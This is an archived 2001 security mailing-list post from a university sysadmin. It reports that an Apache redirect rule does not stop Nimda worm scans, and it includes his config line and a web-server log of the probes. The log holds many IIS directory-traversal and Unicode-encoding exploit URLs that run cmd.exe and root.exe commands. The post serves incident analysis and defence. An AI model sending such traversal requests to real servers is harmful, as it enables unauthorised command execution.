Tina Bird <tbird@precision-guesswork.com> wrote: >Can I ask a question? > >According to Ryan Russell (who's been analyzing the >worm code), Nimda doesn't honor redirects - it just >checks the response it gets from a Web server to >determine whether or not the server is vulnerable. >It doesn't follow redirects. So what does this >actually accomplish? In my experience this is correct. I implemented the redirect this morning ( 09:00 ), and just got an extended scan ( 162 hits ) from a source which appeared to be completely unaffected by the new setting. Evidence provided below. Best regards, Neil Dickey, Ph.D. Research Associate/Sysop Geology Department Northern Illinois University DeKalb, Illinois 60115 ------------------------------------------------------------------ Here's the line in the configuration file ... RedirectMatch (.*)\cmd.exe$ http://127.0.0.1 ... and here's the log trace: hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system 32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system 32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 13:16:38 PDT